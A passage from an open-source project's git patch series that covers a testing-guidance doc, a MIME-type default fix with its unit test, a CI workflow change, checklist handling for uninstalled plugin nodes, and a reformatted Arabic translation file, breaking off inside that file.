Dedicated Dependencies When a component has dedicated dependencies (custom hooks, managers, utilities) that are **only used by that component**, use the following strategy to balance integration testing and unit testing. @@ -231,8 +269,16 @@ const mockGithubStar = (status: number, body: Record, delayMs = import { render, screen, fireEvent, waitFor } from '@testing-library/react' import Component from './index' -// Mock dependencies +// ✅ Import real project components (DO NOT mock these) +// import Loading from '@/app/components/base/loading' +// import { ChildComponent } from './child-component' + +// ✅ Mock external dependencies only jest.mock('@/service/api') +jest.mock('next/navigation', () => ({ + useRouter: () => ({ push: jest.fn() }), + usePathname: () => '/test', +})) // Shared state for mocks (if needed) let mockSharedState = false @@ -379,9 +425,9 @@ describe('Component', () => { ## Coverage Goals -### ⚠️ MANDATORY: Complete Coverage in Single Generation +### ⚠️ MANDATORY: Complete Coverage Per File -Aim for 100% coverage: +When generating tests for a **single file**, aim for 100% coverage in that generation: - ✅ 100% function coverage (every exported function/method tested) - ✅ 100% statement coverage (every line executed) From 916df2d0f7a7998793509bff2103ac6563e1090b Mon Sep 17 00:00:00 2001 From: wangxiaolei Date: Mon, 15 Dec 2025 10:09:11 +0800 Subject: [PATCH 02/68] fix: fix mime type is none (#29579) --- api/core/tools/utils/message_transformer.py | 2 + .../tools/utils/test_message_transformer.py | 86 +++++++++++++++++++ 2 files changed, 88 insertions(+) create mode 100644 api/tests/unit_tests/core/tools/utils/test_message_transformer.py diff --git a/api/core/tools/utils/message_transformer.py b/api/core/tools/utils/message_transformer.py index ca2aa39861..df322eda1c 100644 --- a/api/core/tools/utils/message_transformer.py +++ b/api/core/tools/utils/message_transformer.py @@ -101,6 +101,8 @@ class ToolFileMessageTransformer: meta = message.meta or {} mimetype = meta.get("mime_type", "application/octet-stream") + if not mimetype: + mimetype = "application/octet-stream" # get filename from meta filename = meta.get("filename", None) # if message is str, encode it to bytes diff --git a/api/tests/unit_tests/core/tools/utils/test_message_transformer.py b/api/tests/unit_tests/core/tools/utils/test_message_transformer.py new file mode 100644 index 0000000000..af3cdddd5f --- /dev/null +++ b/api/tests/unit_tests/core/tools/utils/test_message_transformer.py @@ -0,0 +1,86 @@ +import pytest + +import core.tools.utils.message_transformer as mt +from core.tools.entities.tool_entities import ToolInvokeMessage + + +class _FakeToolFile: + def __init__(self, mimetype: str): + self.id = "fake-tool-file-id" + self.mimetype = mimetype + + +class _FakeToolFileManager: + """Fake ToolFileManager to capture the mimetype passed in.""" + + last_call: dict | None = None + + def __init__(self, *args, **kwargs): + pass + + def create_file_by_raw( + self, + *, + user_id: str, + tenant_id: str, + conversation_id: str | None, + file_binary: bytes, + mimetype: str, + filename: str | None = None, + ): + type(self).last_call = { + "user_id": user_id, + "tenant_id": tenant_id, + "conversation_id": conversation_id, + "file_binary": file_binary, + "mimetype": mimetype, + "filename": filename, + } + return _FakeToolFile(mimetype) + + +@pytest.fixture(autouse=True) +def _patch_tool_file_manager(monkeypatch): + # Patch the manager used inside the transformer module + monkeypatch.setattr(mt, "ToolFileManager", _FakeToolFileManager) + # also ensure predictable URL generation (no need to patch; uses id and extension only) + yield + _FakeToolFileManager.last_call = None + + +def _gen(messages): + yield from messages + + +def test_transform_tool_invoke_messages_mimetype_key_present_but_none(): + # Arrange: a BLOB message whose meta contains a mime_type key set to None + blob = b"hello" + msg = ToolInvokeMessage( + type=ToolInvokeMessage.MessageType.BLOB, + message=ToolInvokeMessage.BlobMessage(blob=blob), + meta={"mime_type": None, "filename": "greeting"}, + ) + + # Act + out = list( + mt.ToolFileMessageTransformer.transform_tool_invoke_messages( + messages=_gen([msg]), + user_id="u1", + tenant_id="t1", + conversation_id="c1", + ) + ) + + # Assert: default to application/octet-stream when mime_type is present but None + assert _FakeToolFileManager.last_call is not None + assert _FakeToolFileManager.last_call["mimetype"] == "application/octet-stream" + + # Should yield a BINARY_LINK (not IMAGE_LINK) and the URL ends with .bin + assert len(out) == 1 + o = out[0] + assert o.type == ToolInvokeMessage.MessageType.BINARY_LINK + assert isinstance(o.message, ToolInvokeMessage.TextMessage) + assert o.message.text.endswith(".bin") + # meta is preserved (still contains mime_type: None) + assert "mime_type" in (o.meta or {}) + assert o.meta["mime_type"] is None From b8d54d745e09a659c8a4daeca63d5ede99966cbc Mon Sep 17 00:00:00 2001 From: yyh <92089059+lyzno1@users.noreply.github.com> Date: Mon, 15 Dec 2025 10:10:51 +0800 Subject: [PATCH 03/68] fix(ci): use setup-python to avoid 504 errors and use project oxlint config (#29613) --- .github/workflows/autofix.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/.github/workflows/autofix.yml b/.github/workflows/autofix.yml index 3563c29577..7947382968 100644 --- a/.github/workflows/autofix.yml +++ b/.github/workflows/autofix.yml @@ -13,11 +13,12 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - - # Use uv to ensure we have the same ruff version in CI and locally. - - uses: astral-sh/setup-uv@v6 + - uses: actions/setup-python@v5 with: python-version: "3.11" + + - uses: astral-sh/setup-uv@v6 + - run: | cd api uv sync --dev @@ -85,7 +86,6 @@ jobs: - name: oxlint working-directory: ./web - run: | - pnpx oxlint --fix + run: pnpm exec oxlint --config .oxlintrc.json --fix . - uses: autofix-ci/action@635ffb0c9798bd160680f18fd73371e355b85f27 From 59137f1d0577e793c2be96e200cd0da391a66f54 Mon Sep 17 00:00:00 2001 From: yyh <92089059+lyzno1@users.noreply.github.com> Date: Mon, 15 Dec 2025 10:11:23 +0800 Subject: [PATCH 04/68] fix: show uninstalled plugin nodes in workflow checklist (#29630) --- .../components/workflow/header/checklist.tsx | 16 +- .../workflow/hooks/use-checklist.ts | 20 +- web/i18n/ar-TN/workflow.ts | 2528 ++++++++--------- web/i18n/de-DE/workflow.ts | 1 + web/i18n/en-US/workflow.ts | 1 + web/i18n/es-ES/workflow.ts | 1 + web/i18n/fa-IR/workflow.ts | 1 + web/i18n/fr-FR/workflow.ts | 1 + web/i18n/hi-IN/workflow.ts | 1 + web/i18n/id-ID/workflow.ts | 1 + web/i18n/it-IT/workflow.ts | 1 + web/i18n/ja-JP/workflow.ts | 1 + web/i18n/ko-KR/workflow.ts | 1 + web/i18n/pl-PL/workflow.ts | 1 + web/i18n/pt-BR/workflow.ts | 1 + web/i18n/ro-RO/workflow.ts | 1 + web/i18n/ru-RU/workflow.ts | 1 + web/i18n/sl-SI/workflow.ts | 1 + web/i18n/th-TH/workflow.ts | 1 + web/i18n/tr-TR/workflow.ts | 1 + web/i18n/uk-UA/workflow.ts | 1 + web/i18n/vi-VN/workflow.ts | 1 + web/i18n/zh-Hans/workflow.ts | 1 + web/i18n/zh-Hant/workflow.ts | 1 + 24 files changed, 1315 insertions(+), 1270 deletions(-) diff --git a/web/app/components/workflow/header/checklist.tsx b/web/app/components/workflow/header/checklist.tsx index aa532b98d7..15284a42f0 100644 --- a/web/app/components/workflow/header/checklist.tsx +++ b/web/app/components/workflow/header/checklist.tsx @@ -37,9 +37,13 @@ import useNodes from '@/app/components/workflow/store/workflow/use-nodes' type WorkflowChecklistProps = { disabled: boolean + showGoTo?: boolean + onItemClick?: (item: ChecklistItem) => void } const WorkflowChecklist = ({ disabled, + showGoTo = true, + onItemClick, }: WorkflowChecklistProps) => { const { t } = useTranslation() const [open, setOpen] = useState(false) @@ -49,9 +53,13 @@ const WorkflowChecklist = ({ const { handleNodeSelect } = useNodesInteractions() const handleChecklistItemClick = (item: ChecklistItem) => { - if (!item.canNavigate) + const goToEnabled = showGoTo && item.canNavigate && !item.disableGoTo + if (!goToEnabled) return - handleNodeSelect(item.id) + if (onItemClick) + onItemClick(item) + else + handleNodeSelect(item.id) setOpen(false) } @@ -116,7 +124,7 @@ const WorkflowChecklist = ({ key={node.id} className={cn( 'group mb-2 rounded-lg border-[0.5px] border-components-panel-border bg-components-panel-bg shadow-xs last-of-type:mb-0', - node.canNavigate ? 'cursor-pointer' : 'cursor-default opacity-80', + showGoTo && node.canNavigate && !node.disableGoTo ? 'cursor-pointer' : 'cursor-default opacity-80', )} onClick={() => handleChecklistItemClick(node)} > @@ -130,7 +138,7 @@ const WorkflowChecklist = ({ {node.title} { - node.canNavigate && ( + (showGoTo && node.canNavigate && !node.disableGoTo) && (
{t('workflow.panel.goTo')} diff --git a/web/app/components/workflow/hooks/use-checklist.ts b/web/app/components/workflow/hooks/use-checklist.ts index 8144120bfe..cd1f051eb5 100644 --- a/web/app/components/workflow/hooks/use-checklist.ts +++ b/web/app/components/workflow/hooks/use-checklist.ts @@ -66,6 +66,7 @@ export type ChecklistItem = { unConnected?: boolean errorMessage?: string canNavigate: boolean + disableGoTo?: boolean } const START_NODE_TYPES: BlockEnum[] = [ @@ -75,6 +76,13 @@ const START_NODE_TYPES: BlockEnum[] = [ BlockEnum.TriggerPlugin, ] +// Node types that depend on plugins +const PLUGIN_DEPENDENT_TYPES: BlockEnum[] = [ + BlockEnum.Tool, + BlockEnum.DataSource, + BlockEnum.TriggerPlugin, +] + export const useChecklist = (nodes: Node[], edges: Edge[]) => { const { t } = useTranslation() const language = useGetLanguage() @@ -157,7 +165,14 @@ export const useChecklist = (nodes: Node[], edges: Edge[]) => { if (node.type === CUSTOM_NODE) { const checkData = getCheckData(node.data) const validator = nodesExtraData?.[node.data.type as BlockEnum]?.checkValid - let errorMessage = validator ? validator(checkData, t, moreDataForCheckValid).errorMessage : undefined + const isPluginMissing = PLUGIN_DEPENDENT_TYPES.includes(node.data.type as BlockEnum) && node.data._pluginInstallLocked + + // Check if plugin is installed for plugin-dependent nodes first + let errorMessage: string | undefined + if (isPluginMissing) + errorMessage = t('workflow.nodes.common.pluginNotInstalled') + else if (validator) + errorMessage = validator(checkData, t, moreDataForCheckValid).errorMessage if (!errorMessage) { const availableVars = map[node.id].availableVars @@ -194,7 +209,8 @@ export const useChecklist = (nodes: Node[], edges: Edge[]) => { toolIcon, unConnected: isUnconnected && !canSkipConnectionCheck, errorMessage, - canNavigate: true, + canNavigate: !isPluginMissing, + disableGoTo: isPluginMissing, }) } } diff --git a/web/i18n/ar-TN/workflow.ts b/web/i18n/ar-TN/workflow.ts index 0910fc7986..005045c4a7 100644 --- a/web/i18n/ar-TN/workflow.ts +++ b/web/i18n/ar-TN/workflow.ts @@ -1,1296 +1,1296 @@ -const translation // This is an auto-generated translation file for ar-TN. It may be large. - = { - common: { - undo: 'تراجع', - redo: 'إعادة', - editing: 'تعديل', - autoSaved: 'تم الحفظ تلقائيًا', - unpublished: 'غير منشور', - published: 'منشور', - publish: 'نشر', - update: 'تحديث', - publishUpdate: 'نشر التحديث', - run: 'تشغيل', - running: 'جارٍ التشغيل', - listening: 'الاستماع', - chooseStartNodeToRun: 'اختر عقدة البداية للتشغيل', - runAllTriggers: 'تشغيل جميع المشغلات', - inRunMode: 'في وضع التشغيل', - inPreview: 'في المعاينة', - inPreviewMode: 'في وضع المعاينة', - preview: 'معاينة', - viewRunHistory: 'عرض سجل التشغيل', - runHistory: 'سجل التشغيل', - goBackToEdit: 'العودة إلى المحرر', - conversationLog: 'سجل المحادثة', - features: 'الميزات', - featuresDescription: 'تحسين تجربة مستخدم تطبيق الويب', - ImageUploadLegacyTip: 'يمكنك الآن إنشاء متغيرات نوع الملف في نموذج البداية. لن ندعم ميزة تحميل الصور في المستقبل. ', - fileUploadTip: 'تم ترقية ميزات تحميل الصور إلى تحميل الملفات. ', - featuresDocLink: 'تعرف على المزيد', - debugAndPreview: 'معاينة', - restart: 'إعادة تشغيل', - currentDraft: 'المسودة الحالية', - currentDraftUnpublished: 'المسودة الحالية غير منشورة', - latestPublished: 'آخر منشور', - publishedAt: 'تم النشر في', - restore: 'استعادة', - versionHistory: 'سجل الإصدارات', - exitVersions: 'خروج من الإصدارات', - runApp: 'تشغيل التطبيق', - batchRunApp: 'تشغيل التطبيق دفعة واحدة', - openInExplore: 'فتح في الاستكشاف', - accessAPIReference: 'الوصول إلى مرجع API', - embedIntoSite: 'تضمين في الموقع', - addTitle: 'إضافة عنوان...', - addDescription: 'إضافة وصف...', - noVar: 'لا يوجد متغير', - searchVar: 'بحث عن متغير', - variableNamePlaceholder: 'اسم المتغير', - setVarValuePlaceholder: 'تعيين متغير', - needConnectTip: 'هذه الخطوة غير متصلة بأي شيء', - maxTreeDepth: 'الحد الأقصى لـ {{depth}} عقد لكل فرع', - needAdd: 'يجب إضافة عقدة {{node}}', - needOutputNode: 'يجب إضافة عقدة الإخراج', - needStartNode: 'يجب إضافة عقدة بدء واحدة على الأقل', - needAnswerNode: 'يجب إضافة عقدة الإجابة', - workflowProcess: 'عملية سير العمل', - notRunning: 'لم يتم التشغيل بعد', - previewPlaceholder: 'أدخل المحتوى في المربع أدناه لبدء تصحيح أخطاء Chatbot', - effectVarConfirm: { - title: 'إزالة المتغير', - content: 'يتم استخدام المتغير في عقد أخرى. هل ما زلت تريد إزالته؟', +const translation = { + common: { + undo: 'تراجع', + redo: 'إعادة', + editing: 'تعديل', + autoSaved: 'تم الحفظ تلقائيًا', + unpublished: 'غير منشور', + published: 'منشور', + publish: 'نشر', + update: 'تحديث', + publishUpdate: 'نشر التحديث', + run: 'تشغيل', + running: 'جارٍ التشغيل', + listening: 'الاستماع', + chooseStartNodeToRun: 'اختر عقدة البداية للتشغيل', + runAllTriggers: 'تشغيل جميع المشغلات', + inRunMode: 'في وضع التشغيل', + inPreview: 'في المعاينة', + inPreviewMode: 'في وضع المعاينة', + preview: 'معاينة', + viewRunHistory: 'عرض سجل التشغيل', + runHistory: 'سجل التشغيل', + goBackToEdit: 'العودة إلى المحرر', + conversationLog: 'سجل المحادثة', + features: 'الميزات', + featuresDescription: 'تحسين تجربة مستخدم تطبيق الويب', + ImageUploadLegacyTip: 'يمكنك الآن إنشاء متغيرات نوع الملف في نموذج البداية. لن ندعم ميزة تحميل الصور في المستقبل. ', + fileUploadTip: 'تم ترقية ميزات تحميل الصور إلى تحميل الملفات. ', + featuresDocLink: 'تعرف على المزيد', + debugAndPreview: 'معاينة', + restart: 'إعادة تشغيل', + currentDraft: 'المسودة الحالية', + currentDraftUnpublished: 'المسودة الحالية غير منشورة', + latestPublished: 'آخر منشور', + publishedAt: 'تم النشر في', + restore: 'استعادة', + versionHistory: 'سجل الإصدارات', + exitVersions: 'خروج من الإصدارات', + runApp: 'تشغيل التطبيق', + batchRunApp: 'تشغيل التطبيق دفعة واحدة', + openInExplore: 'فتح في الاستكشاف', + accessAPIReference: 'الوصول إلى مرجع API', + embedIntoSite: 'تضمين في الموقع', + addTitle: 'إضافة عنوان...', + addDescription: 'إضافة وصف...', + noVar: 'لا يوجد متغير', + searchVar: 'بحث عن متغير', + variableNamePlaceholder: 'اسم المتغير', + setVarValuePlaceholder: 'تعيين متغير', + needConnectTip: 'هذه الخطوة غير متصلة بأي شيء', + maxTreeDepth: 'الحد الأقصى لـ {{depth}} عقد لكل فرع', + needAdd: 'يجب إضافة عقدة {{node}}', + needOutputNode: 'يجب إضافة عقدة الإخراج', + needStartNode: 'يجب إضافة عقدة بدء واحدة على الأقل', + needAnswerNode: 'يجب إضافة عقدة الإجابة', + workflowProcess: 'عملية سير العمل', + notRunning: 'لم يتم التشغيل بعد', + previewPlaceholder: 'أدخل المحتوى في المربع أدناه لبدء تصحيح أخطاء Chatbot', + effectVarConfirm: { + title: 'إزالة المتغير', + content: 'يتم استخدام المتغير في عقد أخرى. هل ما زلت تريد إزالته؟', + }, + insertVarTip: 'اضغط على مفتاح \'/\' للإدراج بسرعة', + processData: 'معالجة البيانات', + input: 'إدخال', + output: 'إخراج', + jinjaEditorPlaceholder: 'اكتب \'/\' أو \'{\' لإدراج متغير', + viewOnly: 'عرض فقط', + showRunHistory: 'عرض سجل التشغيل', + enableJinja: 'تمكين دعم قالب Jinja', + learnMore: 'تعرف على المزيد', + copy: 'نسخ', + duplicate: 'تكرار', + addBlock: 'إضافة عقدة', + pasteHere: 'لصق هنا', + pointerMode: 'وضع المؤشر', + handMode: 'وضع اليد', + exportImage: 'تصدير صورة', + exportPNG: 'تصدير كـ PNG', + exportJPEG: 'تصدير كـ JPEG', + exportSVG: 'تصدير كـ SVG', + currentView: 'العرض الحالي', + currentWorkflow: 'سير العمل الحالي', + moreActions: 'المزيد من الإجراءات', + model: 'النموذج', + workflowAsTool: 'سير العمل كأداة', + configureRequired: 'التكوين مطلوب', + configure: 'تكوين', + manageInTools: 'إدارة في الأدوات', + workflowAsToolTip: 'التكوين المطلوب للأداة بعد تحديث سير العمل.', + workflowAsToolDisabledHint: 'انشر أحدث سير عمل وتأكد من وجود عقدة إدخال مستخدم متصلة قبل تكوينها كأداة.', + viewDetailInTracingPanel: 'عرض التفاصيل', + syncingData: 'مزامنة البيانات، بضع ثوان فقط.', + importDSL: 'استيراد DSL', + importDSLTip: 'سيتم استبدال المسودة الحالية.\nقم بتصدير سير العمل كنسخة احتياطية قبل الاستيراد.', + backupCurrentDraft: 'نسخ احتياطي للمسودة الحالية', + chooseDSL: 'اختر ملف DSL', + overwriteAndImport: 'استبدال واستيراد', + importFailure: 'فشل الاستيراد', + importWarning: 'تحذير', + importWarningDetails: 'قد يؤثر اختلاف إصدار DSL على ميزات معينة', + importSuccess: 'تم الاستيراد بنجاح', + parallelTip: { + click: { + title: 'نقرة', + desc: ' للإضافة', }, - insertVarTip: 'اضغط على مفتاح \'/\' للإدراج بسرعة', - processData: 'معالجة البيانات', - input: 'إدخال', - output: 'إخراج', - jinjaEditorPlaceholder: 'اكتب \'/\' أو \'{\' لإدراج متغير', - viewOnly: 'عرض فقط', - showRunHistory: 'عرض سجل التشغيل', - enableJinja: 'تمكين دعم قالب Jinja', - learnMore: 'تعرف على المزيد', - copy: 'نسخ', - duplicate: 'تكرار', - addBlock: 'إضافة عقدة', - pasteHere: 'لصق هنا', - pointerMode: 'وضع المؤشر', - handMode: 'وضع اليد', - exportImage: 'تصدير صورة', - exportPNG: 'تصدير كـ PNG', - exportJPEG: 'تصدير كـ JPEG', - exportSVG: 'تصدير كـ SVG', - currentView: 'العرض الحالي', - currentWorkflow: 'سير العمل الحالي', - moreActions: 'المزيد من الإجراءات', + drag: { + title: 'سحب', + desc: ' للتوصيل', + }, + limit: 'يقتصر التوازي على {{num}} فروع.', + depthLimit: 'حد طبقة التداخل المتوازي {{num}} طبقات', + }, + disconnect: 'قطع الاتصال', + jumpToNode: 'القفز إلى هذه العقدة', + addParallelNode: 'إضافة عقدة متوازية', + parallel: 'توازي', + branch: 'فرع', + onFailure: 'عند الفشل', + addFailureBranch: 'إضافة فرع فشل', + loadMore: 'تحميل المزيد', + noHistory: 'لا يوجد سجل', + tagBound: 'عدد التطبيقات التي تستخدم هذه العلامة', + }, + publishLimit: { + startNodeTitlePrefix: 'قم بالترقية إلى', + startNodeTitleSuffix: 'فتح مشغلات غير محدودة لكل سير عمل', + startNodeDesc: 'لقد وصلت إلى الحد المسموح به وهو 2 مشغلات لكل سير عمل لهذه الخطة. قم بالترقية لنشر سير العمل هذا.', + }, + env: { + envPanelTitle: 'متغيرات البيئة', + envDescription: 'يمكن استخدام متغيرات البيئة لتخزين المعلومات الخاصة وبيانات الاعتماد. فهي للقراءة فقط ويمكن فصلها عن ملف DSL أثناء التصدير.', + envPanelButton: 'إضافة متغير', + modal: { + title: 'إضافة متغير بيئة', + editTitle: 'تعديل متغير بيئة', + type: 'النوع', + name: 'الاسم', + namePlaceholder: 'اسم المتغير', + value: 'القيمة', + valuePlaceholder: 'قيمة المتغير', + secretTip: 'يستخدم لتحديد معلومات أو بيانات حساسة، مع إعدادات DSL المكونة لمنع التسرب.', + description: 'الوصف', + descriptionPlaceholder: 'وصف المتغير', + }, + export: { + title: 'تصدير متغيرات البيئة السرية؟', + checkbox: 'تصدير القيم السرية', + ignore: 'تصدير DSL', + export: 'تصدير DSL مع القيم السرية ', + }, + }, + globalVar: { + title: 'متغيرات النظام', + description: 'متغيرات النظام هي متغيرات عامة يمكن الإشارة إليها بواسطة أي عقدة دون توصيل عندما يكون النوع صحيحًا، مثل معرف المستخدم ومعرف سير العمل.', + fieldsDescription: { + conversationId: 'معرف المحادثة', + dialogCount: 'عدد المحادثات', + userId: 'معرف المستخدم', + triggerTimestamp: 'توقيت بدء التطبيق', + appId: 'معرف التطبيق', + workflowId: 'معرف سير العمل', + workflowRunId: 'معرف تشغيل سير العمل', + }, + }, + sidebar: { + exportWarning: 'تصدير النسخة المحفوظة الحالية', + exportWarningDesc: 'سيؤدي هذا إلى تصدير النسخة المحفوظة الحالية من سير العمل الخاص بك. إذا كانت لديك تغييرات غير محفوظة في المحرر، يرجى حفظها أولاً باستخدام خيار التصدير في لوحة سير العمل.', + }, + chatVariable: { + panelTitle: 'متغيرات المحادثة', + panelDescription: 'تستخدم متغيرات المحادثة لتخزين المعلومات التفاعلية التي يحتاج LLM إلى تذكرها، بما في ذلك سجل المحادثة والملفات التي تم تحميلها وتفضيلات المستخدم. هم للقراءة والكتابة. ', + docLink: 'قم بزيارة مستنداتنا لمعرفة المزيد.', + button: 'إضافة متغير', + modal: { + title: 'إضافة متغير محادثة', + editTitle: 'تعديل متغير محادثة', + name: 'الاسم', + namePlaceholder: 'اسم المتغير', + type: 'النوع', + value: 'القيمة الافتراضية', + valuePlaceholder: 'القيمة الافتراضية، اتركها فارغة لعدم التعيين', + description: 'الوصف', + descriptionPlaceholder: 'وصف المتغير', + editInJSON: 'تعديل في JSON', + oneByOne: 'إضافة واحدة تلو الأخرى', + editInForm: 'تعديل في النموذج', + arrayValue: 'القيمة', + addArrayValue: 'إضافة قيمة', + objectKey: 'مفتاح', + objectType: 'النوع', + objectValue: 'القيمة الافتراضية', + }, + storedContent: 'المحتوى المخزن', + updatedAt: 'تم التحديث في ', + }, + changeHistory: { + title: 'سجل التغييرات', + placeholder: 'لم تقم بتغيير أي شيء بعد', + clearHistory: 'مسح السجل', + hint: 'تلميح', + hintText: 'يتم تتبع إجراءات التحرير الخاصة بك في سجل التغييرات، والذي يتم تخزينه على جهازك طوال مدة هذه الجلسة. سيتم مسح هذا السجل عند مغادرة المحرر.', + stepBackward_one: '{{count}} خطوة إلى الوراء', + stepBackward_other: '{{count}} خطوات إلى الوراء', + stepForward_one: '{{count}} خطوة إلى الأمام', + stepForward_other: '{{count}} خطوات إلى الأمام', + sessionStart: 'بدء الجلسة', + currentState: 'الحالة الحالية', + nodeTitleChange: 'تم تغيير عنوان العقدة', + nodeDescriptionChange: 'تم تغيير وصف العقدة', + nodeDragStop: 'تم نقل العقدة', + nodeChange: 'تم تغيير العقدة', + nodeConnect: 'تم توصيل العقدة', + nodePaste: 'تم لصق العقدة', + nodeDelete: 'تم حذف العقدة', + nodeAdd: 'تم إضافة العقدة', + nodeResize: 'تم تغيير حجم العقدة', + noteAdd: 'تم إضافة ملاحظة', + noteChange: 'تم تغيير الملاحظة', + noteDelete: 'تم حذف الملاحظة', + edgeDelete: 'تم قطع اتصال العقدة', + }, + errorMsg: { + fieldRequired: '{{field}} مطلوب', + rerankModelRequired: 'مطلوب تكوين نموذج Rerank', + authRequired: 'الترخيص مطلوب', + invalidJson: '{{field}} هو JSON غير صالح', + fields: { + variable: 'اسم المتغير', + variableValue: 'قيمة المتغير', + code: 'الكود', model: 'النموذج', - workflowAsTool: 'سير العمل كأداة', - configureRequired: 'التكوين مطلوب', - configure: 'تكوين', - manageInTools: 'إدارة في الأدوات', - workflowAsToolTip: 'التكوين المطلوب للأداة بعد تحديث سير العمل.', - workflowAsToolDisabledHint: 'انشر أحدث سير عمل وتأكد من وجود عقدة إدخال مستخدم متصلة قبل تكوينها كأداة.', - viewDetailInTracingPanel: 'عرض التفاصيل', - syncingData: 'مزامنة البيانات، بضع ثوان فقط.', - importDSL: 'استيراد DSL', - importDSLTip: 'سيتم استبدال المسودة الحالية.\nقم بتصدير سير العمل كنسخة احتياطية قبل الاستيراد.', - backupCurrentDraft: 'نسخ احتياطي للمسودة الحالية', - chooseDSL: 'اختر ملف DSL', - overwriteAndImport: 'استبدال واستيراد', - importFailure: 'فشل الاستيراد', - importWarning: 'تحذير', - importWarningDetails: 'قد يؤثر اختلاف إصدار DSL على ميزات معينة', - importSuccess: 'تم الاستيراد بنجاح', - parallelTip: { - click: { - title: 'نقرة', - desc: ' للإضافة', + rerankModel: 'نموذج Rerank المكون', + visionVariable: 'متغير الرؤية', + }, + invalidVariable: 'متغير غير صالح', + noValidTool: '{{field}} لا توجد أداة صالحة محددة', + toolParameterRequired: '{{field}}: المعلمة [{{param}}] مطلوبة', + startNodeRequired: 'الرجاء إضافة عقدة البداية أولاً قبل {{operation}}', + }, + error: { + startNodeRequired: 'الرجاء إضافة عقدة البداية أولاً قبل {{operation}}', + operations: { + connectingNodes: 'توصيل العقد', + addingNodes: 'إضافة العقد', + modifyingWorkflow: 'تعديل سير العمل', + updatingWorkflow: 'تحديث سير العمل', + }, + }, + singleRun: { + testRun: 'تشغيل اختياري', + startRun: 'بدء التشغيل', + preparingDataSource: 'تحضير مصدر البيانات', + reRun: 'إعادة التشغيل', + running: 'جارٍ التشغيل', + testRunIteration: 'تكرار تشغيل الاختبار', + back: 'خلف', + iteration: 'تكرار', + loop: 'حلقة', + }, + tabs: { + 'searchBlock': 'بحث عن عقدة', + 'start': 'البداية', + 'blocks': 'العقد', + 'searchTool': 'أداة البحث', + 'searchTrigger': 'بحث عن المشغلات...', + 'allTriggers': 'كل المشغلات', + 'tools': 'الأدوات', + 'allTool': 'الكل', + 'plugin': 'الإضافة', + 'customTool': 'مخصص', + 'workflowTool': 'سير العمل', + 'question-understand': 'فهم السؤال', + 'logic': 'المنطق', + 'transform': 'تحويل', + 'utilities': 'الأدوات المساعدة', + 'noResult': 'لم يتم العثور على تطابق', + 'noPluginsFound': 'لم يتم العثور على إضافات', + 'requestToCommunity': 'طلبات للمجتمع', + 'agent': 'استراتيجية الوكيل', + 'allAdded': 'تمت إضافة الكل', + 'addAll': 'إضافة الكل', + 'sources': 'المصادر', + 'searchDataSource': 'بحث في مصدر البيانات', + 'featuredTools': 'المميزة', + 'showMoreFeatured': 'عرض المزيد', + 'showLessFeatured': 'عرض أقل', + 'installed': 'مثبت', + 'pluginByAuthor': 'بواسطة {{author}}', + 'usePlugin': 'حدد الأداة', + 'hideActions': 'إخفاء الأدوات', + 'noFeaturedPlugins': 'اكتشف المزيد من الأدوات في السوق', + 'noFeaturedTriggers': 'اكتشف المزيد من المشغلات في السوق', + 'startDisabledTip': 'تتعارض عقدة المشغل وعقدة إدخال المستخدم.', + }, + blocks: { + 'start': 'إدخال المستخدم', + 'originalStartNode': 'عقدة البداية الأصلية', + 'end': 'الإخراج', + 'answer': 'إجابة', + 'llm': 'LLM', + 'knowledge-retrieval': 'استرجاع المعرفة', + 'question-classifier': 'مصنف الأسئلة', + 'if-else': 'IF/ELSE', + 'code': 'كود', + 'template-transform': 'قالب', + 'http-request': 'طلب HTTP', + 'variable-assigner': 'مجمع المتغيرات', + 'variable-aggregator': 'مجمع المتغيرات', + 'assigner': 'معين المتغيرات', + 'iteration-start': 'بداية التكرار', + 'iteration': 'تكرار', + 'parameter-extractor': 'مستخرج المعلمات', + 'document-extractor': 'مستخرج المستندات', + 'list-operator': 'مشغل القائمة', + 'agent': 'وكيل', + 'loop-start': 'بداية الحلقة', + 'loop': 'حلقة', + 'loop-end': 'خروج من الحلقة', + 'knowledge-index': 'قاعدة المعرفة', + 'datasource': 'مصدر البيانات', + 'trigger-schedule': 'جدولة المشغل', + 'trigger-webhook': 'مشغل الويب هوك', + 'trigger-plugin': 'مشغل الإضافة', + }, + customWebhook: 'ويب هوك مخصص', + blocksAbout: { + 'start': 'تحديد المعلمات الأولية لبدء سير العمل', + 'end': 'تحديد الإخراج ونوع النتيجة لسير العمل', + 'answer': 'تحديد محتوى الرد لمحادثة الدردشة', + 'llm': 'استدعاء نماذج اللغة الكبيرة للإجابة على الأسئلة أو معالجة اللغة الطبيعية', + 'knowledge-retrieval': 'يسمح لك بالاستعلام عن محتوى النص المتعلق بأسئلة المستخدم من المعرفة', + 'question-classifier': 'تحديد شروط تصنيف أسئلة المستخدم، يمكن لـ LLM تحديد كيفية تقدم المحادثة بناءً على وصف التصنيف', + 'if-else': 'يسمح لك بتقسيم سير العمل إلى فرعين بناءً على شروط if/else', + 'code': 'تنفيذ قطعة من كود Python أو NodeJS لتنفيذ منطق مخصص', + 'template-transform': 'تحويل البيانات إلى سلسلة باستخدام بنية قالب Jinja', + 'http-request': 'السماح بإرسال طلبات الخادم عبر بروتوكول HTTP', + 'variable-assigner': 'تجميع متغيرات متعددة الفروع في متغير واحد للتكوين الموحد للعقد النهائية.', + 'assigner': 'تُستخدم عقدة تعيين المتغير لتعيين قيم للمتغيرات القابلة للكتابة (مثل متغيرات المحادثة).', + 'variable-aggregator': 'تجميع متغيرات متعددة الفروع في متغير واحد للتكوين الموحد للعقد النهائية.', + 'iteration': 'تنفيذ خطوات متعددة على كائن قائمة حتى يتم إخراج جميع النتائج.', + 'loop': 'تنفيذ حلقة من المنطق حتى يتم استيفاء شروط الإنهاء أو الوصول إلى الحد الأقصى لعدد الحلقات.', + 'loop-end': 'يعادل "break". هذه العقدة لا تحتوي على عناصر تكوين. عندما يصل جسم الحلقة إلى هذه العقدة، تنتهي الحلقة.', + 'parameter-extractor': 'استخدم LLM لاستخراج المعلمات الهيكلية من اللغة الطبيعية لاستدعاء الأدوات أو طلبات HTTP.', + 'document-extractor': 'تستخدم لتحليل المستندات التي تم تحميلها إلى محتوى نصي يسهل فهمه بواسطة LLM.', + 'list-operator': 'تستخدم لتصفية أو فرز محتوى المصفوفة.', + 'agent': 'استدعاء نماذج اللغة الكبيرة للإجابة على الأسئلة أو معالجة اللغة الطبيعية', + 'knowledge-index': 'حول قاعدة المعرفة', + 'datasource': 'حول مصدر البيانات', + 'trigger-schedule': 